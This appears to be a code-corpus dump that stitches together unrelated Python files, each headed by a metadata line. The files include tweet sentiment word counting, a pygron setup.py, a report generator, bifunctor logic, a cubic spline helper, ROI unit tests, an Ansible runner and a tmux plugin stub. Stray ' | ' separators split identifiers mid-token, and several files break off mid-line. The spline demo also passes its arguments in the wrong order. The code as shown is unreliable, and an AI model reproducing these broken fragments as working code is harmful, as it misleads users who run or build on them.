QUERY_WORDLIST_ACTIVE = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'active'"
QUERY_WORDLIST_PASSIVE = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'passive'"
QUERY_WORDLIST_PAIN = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'pain'"
QUERY_WORDLIST_PLEASURE = "SELECT Word FROM " + r.DB_TABLE_WORDLISTS + " WHERE Category = 'pleasure'"
# Create lists of keywords to match against the search results
WordListNegative = ReturnQueryAsList(cur, QUERY_WORDLIST_NEGATIVE)
WordListPositive = ReturnQueryAsList(cur, QUERY_WORDLIST_POSITIVE)
WordListStrong = ReturnQueryAsList(cur, QUERY_WORDLIST_STRONG)
WordListHostile = ReturnQueryAsList(cur, QUERY_WORDLIST_HOSTILE)
WordListPower = ReturnQueryAsList(cur, QUERY_WORDLIST_POWER)
WordListWeak = ReturnQueryAsList(cur, QUERY_WORDLIST_WEAK)
WordListActive = ReturnQueryAsList(cur, QUERY_WORDLIST_ACTIVE)
WordListPassive = ReturnQueryAsList(cur, QUERY_WORDLIST_PASSIVE)
WordListPain = ReturnQueryAsList(cur, QUERY_WORDLIST_PAIN)
WordListPleasure = ReturnQueryAsList(cur, QUERY_WORDLIST_PLEASURE)
# Retrieve the contents of the tbl_SearchResults table
SearchResults = GetSearchResults(cur)
TotalTweets = 0
TotalWords = 0
ResultsDict = {
'timestamp': 0,
'positive': 0,
'negative': 0,
'strong': 0,
'hostile': 0,
'power': 0,
'weak': 0,
'active': 0,
'passive': 0,
'pain': 0,
'pleasure': 0
}
# Calculate the wordcounts for each search result against each of the keyword lists
for Result in SearchResults:
ResultAsList = SentenceToList(Result)
TotalTweets = TotalTweets + 1
TotalWords = TotalWords + len(ResultAsList)
ResultsDict['negative'] = ResultsDict['negative'] + CalculateWordCount(ResultAsList, WordListNegative)
Res | ultsDict['positive'] = ResultsDict['positive'] + CalculateWordCount(ResultAsList, WordListPositive)
ResultsDict['strong'] = ResultsDict['strong'] + Calculate | WordCount(ResultAsList, WordListStrong)
ResultsDict['hostile'] = ResultsDict['hostile'] + CalculateWordCount(ResultAsList, WordListHostile)
ResultsDict['power'] = ResultsDict['power'] + CalculateWordCount(ResultAsList, WordListPower)
ResultsDict['weak'] = ResultsDict['weak'] + CalculateWordCount(ResultAsList, WordListWeak)
ResultsDict['active'] = ResultsDict['active'] + CalculateWordCount(ResultAsList, WordListActive)
ResultsDict['passive'] = ResultsDict['passive'] + CalculateWordCount(ResultAsList, WordListPassive)
ResultsDict['pain'] = ResultsDict['pain'] + CalculateWordCount(ResultAsList, WordListPain)
ResultsDict['pleasure'] = ResultsDict['pleasure'] + CalculateWordCount(ResultAsList, WordListPleasure)
if InsertResultsIntoDatabase(cur, TimeStamp, ResultsDict, TotalTweets, TotalWords) == True:
db.commit()
ProcessResult = True
db.close
logging.info('%s - Retrieved %s tweets containing %s words with result %s', FN_NAME, TotalTweets, TotalWords, ProcessResult)
return ProcessResult
|
akshbn/pygron | setup.py | Python | mit | 330 | 0.087879 | from setuptools import setup,find_pack | ages
setup(
name = 'pygron',
version = '0.3.1',
license = 'MIT',
author = 'Akshay B N',
description = 'Helps JSON become greppable',
zip_safe = False,
url = 'https://github.com/akshbn/pygron',
packages = find_packages(),
entry_points = {"console_scripts":["py | gron=pygron.cli_entry:main"]}
)
|
xhan-shannon/SystemControlView | utils/ReportGenerator.py | Python | gpl-2.0 | 460,449 | 0.012301 | #!/usr/bin/python
""" The report generator handles commands from the user to configure reports,
then obtains the data from the requested file,
then writes the report file.
"""
import rxt
import os
import sys
import locale
import traceback
import simpl
import simplejson
import time
import datetime
import csv
import shutil
import copy
import ConfigParser
import logging
import BaseJSONListener
import SrDB
import bz2
import tarfile
import re
import sets
import types
import codecs
import reportlab
import BusyBoa
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter, A4
from reportlab.graphics import renderPDF
from reportlab.lib import colors
from reportlab.lib.colors import Color
from reportlab.graphics.shapes import Drawing
from reportlab.graphics.charts.barcharts import VerticalBarChart
# Tables
from reportlab.tools.docco.rl_doc_utils import *
# Platypus
from reportlab.platypus import Frame, PageTemplate, SimpleDocTemplate, Paragraph, Spacer, PageBreak, tableofcontents, TableStyle
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.rl_config import defaultPageSize
from reportlab.lib.units import inch, mm
from reportlab.pdfbase import pdfmetrics
from reportlab.lib.utils import ImageReader
#import pdb
page_size = 15 # Should be equal with module constant!!!
normal_event_page = 500 # This is for the basic event constant
class reportGenerator(BaseJSONListener.BaseJSONListener):
"""reportGenerator class
Make reports from result *.json files in report_temp folder.
"""
MyJSONUserError = BaseJSONListener.JSONUserError
date_format = '%Y-%m-%d %H:%M:%S'
report_info = { 'custname' : '',
'contactname' : '',
'custaddress' : '',
'custemail' : '',
'custphone' : '',
'username' : '',
'title' : '',
'useraddress' : '',
'useremail' : '',
'userphone' : '',
'ticketid' : '',
'note' : '',
'comment1' : '',
'comment2' : '',
'comment3' : ''
}
debug = False
#debug = True
def __init__(self,_debug = False):
self.debug = _debug
BaseJSONListener.BaseJSONListener.__init__(self, 'Report Generator')
cfg_file = ConfigParser.ConfigParser()
cfg_file.read('/etc/rxt.conf')
id = 'System Files'
self.temp_report_path = cfg_file.get(id, 'basedir') + 'report_temp'
self.report_path = cfg_file.get(id, 'report')
self.data_entry_file = cfg_file.get(id, 'data_entry')
self.write_log('temp=%s, re | port=%s' % (self.temp_report_path, self.report_path))
# Create /home/Sunrise/report_temp if it doesn not exists
if not os.path.isdir(self.temp_report_path):
try:
os.mkdir(self.temp_report_path)
except:
self.write_log('Test Cannot Create %s' % self.temp_report_path, 'Error', sys.exc_info())
# Create /home/sunrise/measurement/report if i | t doesn not exists
if not os.path.isdir(self.report_path):
try:
os.mkdir(self.report_path)
except:
self.write_log('Test Cannot Create %s' % self.report_path, 'Error', sys.exc_info())
# saved data entry
data = None
try:
f_info = open(self.data_entry_file, 'r')
data = f_info.read()
f_info.close()
except:
self.write_log('Failed to load file "%s"!' % self.data_entry_file, 'Error', sys.exc_info())
if data is not None:
try:
reportGenerator.report_info = eval(data)
except:
self.write_log('Failed to eval saved report info!', 'Error', sys.exc_info())
# number formating
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
self.write_log(locale.getlocale(), 'Locale:')
self.write_log(locale.format('%.2f', 10250456.10, True), 'Number format:')
# data font
#pdfmetrics._py_getFont(dataFontType) # not support on hw
pdfmetrics.getEncoding(reportEncoding)
pdfmetrics.getTypeFace(dataFontType)
self.dataFont = pdfmetrics.Font(dataFontType, dataFontType, reportEncoding)
def write_log(self, message, type = 'Info', ex = None):
if self.debug:
print '[REPGEN]\t%s\t%s' % (type, message)
if ex is not None:
print '[REPGEN]\tError Type:\t%s' % ex[0]
print '[REPGEN]\tError Value:\t%s ' % ex[1]
print '[REPGEN]\tTraceback:\t%s\n' % traceback.extract_tb(ex[2])
if type == 'Error' or ex is not None:
self.log.error(message)
else:
self.log.debug(message)
def send_INTERNAL_CMD(self, cmd):
while (self.next_server_id == None):
try:
self.next_server_id = simpl.name_locate(self.next_server_name)
except simpl.error, reason:
self.write_log('Name locate error (%s) looking for %s'
% (reason, self.next_server_name), 'Error', sys.exc_info())
except:
self.write_log('Other Exception.', 'Error', sys.exc_info())
time.sleep(0.5)
if self.next_server_id is not None:
return simplejson.loads(simpl.Send(self.next_server_id, simplejson.dumps(cmd), 1))
else:
self.write_log('Error in send_INTERNAL_CMD\n', 'Error')
return None
def do_SET_DATE_FORMAT(self, params):
self.date_format = params['format']
self.write_log("Setting Date Format: %s" % self.date_format)
def do_SET_REPORT_INFO (self, params):
"""Receive messages from other processes to configure and create reports
@type params: dictionary
@param params: command received by the "reportGenerator"
@return: dictionary
"""
params.pop('')
reportGenerator.report_info.update(params)
try:
f_info = open(self.data_entry_file, 'w')
f_info.write(str(reportGenerator.report_info))
f_info.close()
except:
self.write_log('Failed to write file "%s"!' % self.data_entry_file, 'Error', sys.exc_info())
resp = {}
resp['_'] = 'SET-REPORT-INFO'
resp['rc'] = 0
resp['cmdresp'] = 0
return resp
def do_RTRV_REPORT_INFO (self, params):
"""Receive messages from other processes to configure and create reports
@type params: dictionary
@param params: command received by the "reportGenerator"
@return: dictionary
"""
resp = {}
resp = reportGenerator.report_info
resp['_'] = 'RTRV-REPORT-INFO'
return resp
def read_data_from_files(self, params):
file_lookup = {0: 'config',
1: 'vcat',
2: 'result_otn',
3: 'result_sonet',
4: 'result_sdh',
5: 'result_wan',
7: 'result_rfc2544',
8: 'result_iptest',
9: 'result_loopback',
10: 'result_monitor',
11: 'result_e4',
12: 'result_e3',
13: 'result_e2',
14: 'result_e1',
15: 'result_ds3',
16: 'result_ds2',
17: 'result_ds1',
18: 'result_error',
19: 'result_y156sam',
20: 'result_fc_bert',
21: 'result_fc_rfc2544',
22: 'result_fc_loopback',
23: 'result_fc_b2b',
24: 'result_capture',
25: 'mo |
koreiklein/fantasia | calculus/basic/bifunctor.py | Python | gpl-2.0 | 13,217 | 0.019747 | # Copyright (C) 2013 Korei Klein <korei.klein1@gmail.com>
from misc import *
from calculus import variable
from lib import common_vars
from lib.common_symbols import domainSymbol, relationSymbol, leftSymbol, rightSymbol
from calculus.basic import endofunctor
from calculus.basic import formula
class UntransportableException(Exception):
def __init__(self, unliftableException):
self.unliftableException = unliftableException
def __str__(self):
return "UntransportableException caused by \n%s"%(self.unliftableException,)
class UntransportingOrException(UntransportableException):
def __init__(self, B):
self.B = B
def __str__(self):
return "UntransportingOrException can't transport %s"%(self.B,)
class Bifunctor:
def onObjects(self, left, right):
raise Exception("Abstract superclass.")
def onArrows(self, left, right):
raise Exception("Abstract superclass.")
# return a function representing a natural transform F(., .) o (B|.) --> F(B|., B|.)
def _import(self, B):
raise Exception("Abstract superclass.")
# return those variable quantified anywhere in self.
def variables(self):
raise Exception("Abstract superclass.")
# a natural transform B|F(., .) --> F(B|., .)
def _importLeft(self, B):
raise Exception("Abstract superclass.")
# a natural transform B|F(., .) --> F(., B|.)
def _importRight(self, B):
raise Exception("Abstract superclass.")
# a natural transform F(B|., .) --> B|(F., .)
# or raise an UnliftableException
def _liftLeft(self, B):
raise endofunctor.UnliftableException(self, B)
# a natural transform F(., B|.) --> B|(F., .)
# or raise an UnliftableException
def _liftRight(self, B):
raise endofunctor.UnliftableException(self, B)
# B: an enriched formula such that B.forwardCopy() is defined.
# return a function representing a natural transform: F(B, .) --> F(B, B|.)
def transport_duplicating(self, B):
# F(B, x) --> F(B|B, x) --> F(B, B|x)
return (lambda x:
self.onArrows(B.forwardCopy(), x.identity()).forwardCompose(
self.transport(B)(B, x)))
# return a function reperesenting a natural transform: F(B|., .) --> F(., B|.) if possible,
# otherwise, raise an intransportable exception.
def transport(self, B):
try:
lifted = self._liftLeft(B)
except endofunctor.UnliftableException as e:
raise UntransportableException(e)
# F(B|., .) --> B|F(., .) --> F(., B|.)
return (lambda x, y:
lifted(x, y).forwardCompose(self._importRight(B)(x, y)))
def precompose(self, left, right):
assert(left.covariant())
assert(right.covariant())
return PrecompositeBifunctor(self, left, right)
def precomposeLeft(self, left):
return self.precompose(left = left, right = endofunctor.identity_functor)
def precomposeRight(self, right):
return self.precompose(left = endofunctor.identity_functor, right = right)
def compose(self, other):
assert(other.covariant())
return PostcompositeBifunctor(self, other)
def join(self):
return Join(self)
def commute(self):
return Commute(self)
class Commute(Bifunctor):
def __init__(self, bifunctor):
self.bifunctor = bifunctor
def __repr__(self):
return "commute %s"%(self.bifunctor,)
def onObjects(self, left, right):
return self.bifunctor.onObjects(right, left)
def onArrows(self, left, right):
return self.bifunctor.onArrows(right, left)
def _import(self, B):
return (lambda x, y:
self.bifunctor._import(B)(y, x))
def variables(self):
return self.bifunctor.variables()
def _im | portLeft(self, B):
return (lambda x, y:
self.bifunctor._importRight(B)(y, x))
def | _importRight(self, B):
return (lambda x, y:
self.bifunctor._importLeft(B)(y, x))
def _liftLeft(self, B):
# May throw an exception.
lift = self.bifunctor._liftRight(B)
return (lambda x, y:
lift(y, x))
def _liftRight(self, B):
# May throw an exception.
lift = self.bifunctor._liftLeft(B)
return (lambda x, y:
lift(y, x))
class And(Bifunctor):
def __repr__(self):
return "AND"
def onObjects(self, left, right):
return formula.And(left, right)
def onArrows(self, left, right):
return formula.OnAnd(left, right)
def variables(self):
return []
def _import(self, B):
# B|(x|y) --> (B|B)|(x|y) --> B|(B|(x|y)) --> B|((B|x)|y) --> (B|x)|(B|y)
return (lambda x, y:
formula.And(B, formula.And(x, y)).forwardOnLeftFollow(lambda f:
f.forwardCopy()).forwardFollow(lambda f:
f.forwardAssociate()).forwardFollow(lambda f:
f.forwardOnRight(self._importLeft(B)(x, y))).forwardCompose(
self._importRight(B)(formula.And(B, x), y)))
def _liftLeft(self, B):
# ((B|x)|y) --> B|(x|y)
return (lambda x, y: self.onObjects(formula.And(B, x), y).forwardAssociate())
def _liftRight(self, B):
# (x|(B|y)) --> (x|B)|y --> (B|x)|y --> B|(x|y)
return (lambda x, y:
self.onObjects(x, formula.And(B, y)).forwardAssociateOther().forwardFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
x.forwardCommute()).forwardFollow(lambda x:
x.forwardAssociate())))
def _importLeft(self, B):
# B|(x|y) --> (B|x)|y
return (lambda x, y: formula.And(B, formula.And(x, y)).forwardAssociateOther())
def _importRight(self, B):
# B|(x|y) --> (x|y)|B --> x|(y|B) --> x|(B|y)
return (lambda x, y:
formula.And(B, formula.And(x, y)).forwardCommute().forwardFollow(lambda x:
x.forwardAssociate()).forwardFollow(lambda x:
x.forwardOnRightFollow(lambda x:
x.forwardCommute())))
and_functor = And()
class Or(Bifunctor):
def __repr__(self):
return "OR"
def onObjects(self, left, right):
return formula.Or(left, right)
def onArrows(self, left, right):
return formula.OnOr(left, right)
def variables(self):
return []
def _import(self, B):
# B|(x-y) --> (B|x)-(B|y)
return (lambda x, y:
formula.And(B, formula.Or(x, y)).forwardDistibute())
def _importLeft(self, B):
return (lambda x, y:
self._import(x, y).forwardCompose(self.onArrows(formula.And(B, x).identity(),
formula.And(B.updateVariables(), y).forwardForgetLeft())))
def _importRight(self, B):
return (lambda x, y:
self._import(x, y).forwardCompose(self.onArrows(formula.And(B, x).forwardForgetLeft(),
formula.And(B.updateVariables(), y).identity())))
or_functor = Or()
class PostcompositeBifunctor(Bifunctor):
def __init__(self, bifunctor, functor):
self.bifunctor = bifunctor
self.functor = functor
def __repr__(self):
return "%s . %s"%(self.bifunctor, self.functor)
def variables(self):
result = []
result.extend(self.bifunctor.variables())
result.extend(self.functor.variables())
return result
def _liftLeft(self, B):
# The following two lines may throw an exception
bifunctor_nt = self.bifunctor._liftLeft(B)
functor_nt = self.functor.lift(B)
return (lambda x, y:
self.functor.onArrow(bifunctor_nt(x, y)).forwardCompose(
functor_nt(self.bifunctor.onObjects(x, y))))
def _liftRight(self, B):
# The following two lines may throw an exception
bifunctor_nt = self.bifunctor._liftRight(B)
functor_nt = self.functor.lift(B)
return (lambda x, y:
self.functor.onArrow(bifunctor_nt(x, y)).forwardCompose(
functor_nt(self.bifunctor.onObjects(x, y))))
def onArrows(self, left, right):
return self.functor.onArrow(self.bifunctor.onArrows(left, right))
def onObjects(self, left, right):
return self.functor.onObject(self.bifunctor.onObjects(left, right))
def precompose(self, left, right):
return PostcompositeBifunctor(bifunctor = self.bifunctor.precompose(left, right),
functor = self.functor)
def compose(self, other):
return PostcompositeBifunctor(bifunctor = self.bifunctor, functor = self.functor.compose(other))
def _import(self, B):
return (lambda left, right:
self.functor._import(B)(self.bifunctor.onObjects(left, right)).forwardCompose(
self.functor.onArrow |
dlundquist/ansible | lib/ansible/runner/__init__.py | Python | gpl-3.0 | 55,816 | 0.005518 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import multiprocessing
import signal
import os
import pwd
import Queue
import random
import traceback
import tempfile
import time
import collections
import socket
import base64
import sys
import pipes
import jinja2
import subprocess
import getpass
import ansible.constants as C
import ansible.inventory
from ansible import utils
from ansible.utils import template
from ansible.utils import check_conditional
from ansible.utils import string_functions
from ansible import errors
from ansible import module_common
import poller
import connection
from return_data import ReturnData
from ansible.callbacks import DefaultRunnerCallbacks, vv
from ansible.module_common import ModuleReplacer
module_replacer = ModuleReplacer(strip_comments=False)
HAS_ATFORK=True
try:
from Crypto.Random import atfork
except ImportError:
HAS_ATFORK=False
multiprocessing_runner = None
OUTPUT_LOCKFILE = tempfile.TemporaryFile()
PROCESS_LOCKFILE = tempfile.TemporaryFile()
################################################
def _executor_hook(job_queue, result_queue, new_stdin):
# attempt workaround of https://github.com/newsapps/beeswithmachineguns/issues/17
# this function also not present in CentOS 6
if HAS_ATFORK:
atfork()
signal.signal(signal.SIGINT, signal.SIG_IGN)
while not job_queue.empty():
try:
host = job_queue.get(block=False)
return_data = multiprocessing_runner._executor(host, new_stdin)
result_queue.put(return_data)
except Queue.Empty:
pass
except:
traceback.print_exc()
class HostVars(dict):
''' A special view of vars_cache that adds values from the inventory when needed. '''
def __init__(self, vars_cache, inventory, vault_password=None):
self.vars_cache = vars_cache
self.inventory = inventory
self.lookup = dict()
self.update(vars_cache)
self.vault_password = vault_password
def __getitem__(self, host):
if host not in self.lookup:
result = self.inventory.get_variables(host, vault_password=self.vault_password)
result.update(self.vars_cache.get(host, {}))
self.lookup[host] = result
return self.lookup[host]
class Runner(object):
''' core API interface to ansible '''
# see bin/ansible for how this is used...
def __init__(self,
host_list=C.DEFAULT_HOST_LIST, # ex: /etc/ansible/hosts, legacy usage
module_path=None, # ex: /usr/share/ansible
module_name=C.DEFAULT_MODULE_NAME, # ex: copy
module_args=C.DEFAULT_MODULE_ARGS, # ex: "src=/tmp/a dest=/tmp/b"
forks=C.DEFAULT_FORKS, # parallelism level
timeout=C.DEFAULT_TIMEOUT, # SSH timeout
pattern=C.DEFAULT_PATTERN, # which hosts? ex: 'all', 'acme.example.org'
remote_user=C.DEFAULT_REMOTE_USER, # ex: 'username'
remote_pass=C.DEFAULT_REMOTE_PASS, # ex: 'password123' or None if using key
remote_port=None, # if SSH on different ports
private_key_file=C.DEFAULT_PRIVATE_KEY_FILE, # if not using keys/passwords
sudo_pass=C.DEFAULT_SUDO_PASS, # ex: 'password123' or None
background=0, # async poll every X seconds, else 0 for non-async
basedir=None, # directory of playbook, if applicable
setup_cache=None, # used to share fact data w/ other tasks
| vars_cache=None, # used to store variables about hosts
tr | ansport=C.DEFAULT_TRANSPORT, # 'ssh', 'paramiko', 'local'
conditional='True', # run only if this fact expression evals to true
callbacks=None, # used for output
sudo=False, # whether to run sudo or not
sudo_user=C.DEFAULT_SUDO_USER, # ex: 'root'
module_vars=None, # a playbooks internals thing
default_vars=None, # ditto
is_playbook=False, # running from playbook or not?
inventory=None, # reference to Inventory object
subset=None, # subset pattern
check=False, # don't make any changes, just try to probe for potential changes
diff=False, # whether to show diffs for template files that change
environment=None, # environment variables (as dict) to use inside the command
complex_args=None, # structured data in addition to module_args, must be a dict
error_on_undefined_vars=C.DEFAULT_UNDEFINED_VAR_BEHAVIOR, # ex. False
accelerate=False, # use accelerated connection
accelerate_ipv6=False, # accelerated connection w/ IPv6
accelerate_port=None, # port to use with accelerated connection
su=False, # Are we running our command via su?
su_user=None, # User to su to when running command, ex: 'root'
su_pass=C.DEFAULT_SU_PASS,
vault_pass=None,
run_hosts=None, # an optional list of pre-calculated hosts to run on
no_log=False, # option to enable/disable logging for a given task
):
# used to lock multiprocess inputs and outputs at various levels
self.output_lockfile = OUTPUT_LOCKFILE
self.process_lockfile = PROCESS_LOCKFILE
if not complex_args:
complex_args = {}
# storage & defaults
self.check = check
self.diff = diff
self.setup_cache = utils.default(setup_cache, lambda: collections.defaultdict(dict))
self.vars_cache = utils.default(vars_cache, lambda: collections.defaultdict(dict))
self.basedir = utils.default(basedir, lambda: os.getcwd())
self.callbacks = utils.default(callbacks, lambda: DefaultRunnerCallbacks())
self.generated_jid = str(random.randint(0, 999999999999))
self.transport = transport
self.inventory = utils.default(inventory, lambda: ansible.inventory.Inventory(host_list))
self.module_vars = utils.default(module_vars, lambda: {})
self.default_vars = utils.default(default_vars, lambda: {})
self.always_run = None
self.connector = connection.Connection(self)
self.conditional = conditional
self.module_name = module_name
self.forks = int(forks)
self.pattern = pattern
self.module_args = module_args
self.timeout = timeout
self.remote_user = remote_user
self.remote_pass = remote_pass
self.remote_port = remote_port
self.private_key_file = private_key_file
self.background = background
self.sudo = sudo
self.sudo_user_var = sudo_user
self.sudo_user = None
self.sudo_pass = sudo_pass
self.is_playbook = is_playbook
self.environment = environment
self.complex_args = complex_args
self.error_on_undefined_vars = error_on_undefined_vars
|
dyf/primopt | spline.py | Python | bsd-2-clause | 1,314 | 0.019787 | import numpy as np
# f(x) = a*x*x*x + b*x*x + c*x + d
# f'(x) = 3*a*x*x + 2*b*x + c
#
# d = x0
# c = dx0
# a + b + c + d = x1
# 3*a + 2*b + c = dx1
#
# a + b + dx0 + x0 = x1
# a + b = x1 - x0 - dx0
# a = x1 - x0 - dx0 - b
#
# 3*a + 2*b + dx0 = dx1
# 3*a + 2*b = dx1 - dx0
# 3*(x1 - x0 - dx0 - b) + 2*b = dx1 - dx0
# -3*b + 2*b = dx1 - dx0 - 3*(x1 - x0 - dx0)
# b = -dx1 + dx0 + 3*(x1 - x0 - dx0)
#
# a = x1 - x0 - dx0 - 0.5 * (dx1 - dx0 - 3*(x1 - x0 - dx0))
def cu | bic_spline_coeffs(p0, v0, p1, v1):
d = p0
c = v0
b = -v1 + v0 + 3*(p1 - p0 - v0)
a = p1 - p0 - v0 - b
return [a,b,c,d]
def cubic_spline_coeffs_list(ps, vs):
return [ cubic_spline_coeffs(ps[i], vs[i], ps[i+1], vs[i+1]) for i in range(len(ps)-1) ]
def cubic_spline(N, ps=None, vs=None, coeffs_list=None):
t = np.linspace(0,1,N)[np.newaxis].T
if coeffs_list is None:
coeffs_list = cubic_spline_coeffs_list(ps, vs)
|
vs = []
for a,b,c,d in coeffs_list:
v = a*t**3 + b*t**2 + c*t + d
vs.append(v)
return np.concatenate(vs).T
if __name__ == "__main__":
import matplotlib.pyplot as plt
Np=4
Nt=100
p = np.random.random((Np,2))*2-1
v = np.random.random((Np,2))*2-1
xy = cubic_spline(p, v, Nt)
plt.plot(xy[0,:], xy[1,:])
plt.show()
|
JudoWill/glue | glue/core/tests/test_roi.py | Python | bsd-3-clause | 29,076 | 0.000378 | #pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
from __future__ import absolute_import, division, print_function
import pytest
import numpy as np
from numpy.testing import assert_almost_equal
from matplotlib.figure import Figure
from glue.core.data import CategoricalComponent
from mock import MagicMock
from ..roi import (RectangularROI, UndefinedROI, CircularROI, PolygonalROI, CategoricalRoi,
MplCircularROI, MplRectangularROI, MplPolygonalROI, MplPickROI, PointROI,
XRangeROI, MplXRangeROI, YRangeROI, MplYRangeROI)
from .. import roi as r
FIG = Figure()
AXES = FIG.add_subplot(111)
class TestRectangle(object):
def setup_method(self, method):
self.roi = RectangularROI()
def test_empty_roi_contains_raises(self):
with pytest.raises(UndefinedROI):
self.roi.contains(1, 2)
def test_scalar_contains(self):
self.roi.update_limits(0, 0, 10, 10)
assert self.roi.contains(5, 5)
assert not self.roi.contains(11, 11)
def test_reset(self):
assert not self.roi.defined()
self.roi.update_limits(0, 0, 10, 10)
assert self.roi.defined()
self.roi.reset()
assert not self.roi.defined()
with pytest.raises(UndefinedROI):
self.roi.contains(5, 5)
def test_empty_to_polygon(self):
x, y = self.roi.to_polygon()
assert x == []
assert y == []
def test_to_polygon(self):
self.roi.update_limits(0, 0, 10, 10)
x, y = self.roi.to_polygon()
poly = PolygonalROI(vx=x, vy=y)
assert poly.contains(5, 5)
def test_ndarray(self):
self.roi.update_limits(0, 0, 10, 10)
x = np.array([5, 6, 2, 11])
y = np.array([5, 11, 2, 11])
result = self.roi.contains(x, y)
assert result[0]
assert not result[1]
assert result[2]
assert not result[3]
def test_corner(self):
self.roi.update_limits(6, 7, 10, 10)
assert self.roi.corner() == (6, 7)
def test_width(self):
self.roi.update_limits(2, 2, 10, 12)
assert self.roi.width() == 8
def test_height( | self):
self.roi.update_limits(2, 2, 10, 12)
assert self.roi.height() == 10
def test_multidim_ndarray(self):
sel | f.roi.update_limits(0, 0, 10, 10)
x = np.array([1, 2, 3, 4]).reshape(2, 2)
y = np.array([1, 2, 3, 4]).reshape(2, 2)
assert self.roi.contains(x, y).all()
assert not self.roi.contains(x + 10, y).any()
assert self.roi.contains(x, y).shape == x.shape
def test_str_undefined(self):
""" str method should not crash """
assert type(str(self.roi)) == str
def test_str_defined(self):
""" str method should not crash """
self.roi.update_limits(1, 2, 3, 4)
assert type(str(self.roi)) == str
class TestXRange(object):
def test_undefined_on_init(self):
assert not XRangeROI().defined()
def test_str(self):
roi = XRangeROI()
assert str(roi) == "Undefined XRangeROI"
roi.set_range(1, 2)
assert str(roi) == "1.000 < x < 2.000"
def test_reset(self):
roi = XRangeROI()
roi.set_range(1, 2)
assert roi.defined()
roi.reset()
assert not roi.defined()
def test_contains(self):
roi = XRangeROI()
roi.set_range(1, 3)
x = np.array([0, 1, 2, 3])
y = np.array([-np.inf, 100, 200, 0])
np.testing.assert_array_equal(roi.contains(x, y),
[False, False, True, False])
def test_contains_undefined(self):
roi = XRangeROI()
with pytest.raises(UndefinedROI):
roi.contains(1, 2)
def test_to_polygon(self):
roi = XRangeROI()
assert roi.to_polygon() == ([], [])
roi.set_range(1, 2)
x, y = roi.to_polygon()
np.testing.assert_array_equal(x, [1, 2, 2, 1, 1])
np.testing.assert_array_equal(y,
[-1e100, -1e100, 1e100, 1e100, -1e100])
class TestYRange(object):
def test_undefined_on_init(self):
assert not YRangeROI().defined()
def test_str(self):
roi = YRangeROI()
assert str(roi) == "Undefined YRangeROI"
roi.set_range(1, 2)
assert str(roi) == "1.000 < y < 2.000"
def test_reset(self):
roi = YRangeROI()
roi.set_range(1, 2)
assert roi.defined()
roi.reset()
assert not roi.defined()
def test_contains(self):
roi = YRangeROI()
roi.set_range(1, 3)
y = np.array([0, 1, 2, 3])
x = np.array([-np.inf, 100, 200, 0])
np.testing.assert_array_equal(roi.contains(x, y),
[False, False, True, False])
def test_contains_undefined(self):
roi = YRangeROI()
with pytest.raises(UndefinedROI):
roi.contains(1, 2)
def test_to_polygon(self):
roi = YRangeROI()
assert roi.to_polygon() == ([], [])
roi.set_range(1, 2)
x, y = roi.to_polygon()
np.testing.assert_array_equal(y, [1, 2, 2, 1, 1])
np.testing.assert_array_equal(x,
[-1e100, -1e100, 1e100, 1e100, -1e100])
class TestCircle(object):
def setup_method(self, method):
self.roi = CircularROI()
def test_undefined_on_creation(self):
assert not self.roi.defined()
def test_contains_on_undefined_contains_raises(self):
with pytest.raises(UndefinedROI):
self.roi.contains(1, 1)
def test_set_center(self):
self.roi.set_center(0, 0)
self.roi.set_radius(1)
assert self.roi.contains(0, 0)
assert not self.roi.contains(2, 2)
self.roi.set_center(2, 2)
assert not self.roi.contains(0, 0)
assert self.roi.contains(2, 2)
def test_set_radius(self):
self.roi.set_center(0, 0)
self.roi.set_radius(1)
assert not self.roi.contains(1.5, 0)
self.roi.set_radius(5)
assert self.roi.contains(1.5, 0)
def test_contains_many(self):
x = [0, 0, 0, 0, 0]
y = [0, 0, 0, 0, 0]
self.roi.set_center(0, 0)
self.roi.set_radius(1)
assert all(self.roi.contains(x, y))
assert all(self.roi.contains(np.asarray(x), np.asarray(y)))
assert not any(self.roi.contains(np.asarray(x) + 10, y))
def test_poly(self):
self.roi.set_center(0, 0)
self.roi.set_radius(1)
x, y = self.roi.to_polygon()
poly = PolygonalROI(vx=x, vy=y)
assert poly.contains(0, 0)
assert not poly.contains(10, 0)
def test_poly_undefined(self):
x, y = self.roi.to_polygon()
assert x == []
assert y == []
def test_reset(self):
assert not self.roi.defined()
self.roi.set_center(0, 0)
assert not self.roi.defined()
self.roi.set_radius(2)
assert self.roi.defined()
self.roi.reset()
assert not self.roi.defined()
def test_multidim(self):
self.roi.set_center(0, 0)
self.roi.set_radius(1)
x = np.array([.1, .2, .3, .4]).reshape(2, 2)
y = np.array([-.1, -.2, -.3, -.4]).reshape(2, 2)
assert self.roi.contains(x, y).all()
assert not self.roi.contains(x + 1, y).any()
assert self.roi.contains(x, y).shape == (2, 2)
class TestPolygon(object):
def setup_method(self, method):
self.roi = PolygonalROI()
def define_as_square(self):
self.roi.reset()
assert not self.roi.defined()
self.roi.add_point(0, 0)
self.roi.add_point(0, 1)
self.roi.add_point(1, 1)
self.roi.add_point(1, 0)
assert self.roi.defined()
def test_contains_on_empty_raises(self):
with pytest.raises(UndefinedROI):
self.roi.contains(1, 2)
def test_remove_empty(self):
self.roi.remove_point(1, 0)
def test_replace(self):
self.define_as_square()
assert self.roi.contains(.9, .02)
self.roi.replace_last_point(0, 0)
assert not self.roi.conta |
huntie/sublime-tmux | tmux.py | Python | mit | 4,727 | 0.004019 | import sublime
import sublime_plugin
from datetime import datetime
import io
import os
import re
import subprocess
import sys
def get_setting(key, default=None):
settings = sublime.load_settings('tmux.sublime-settings')
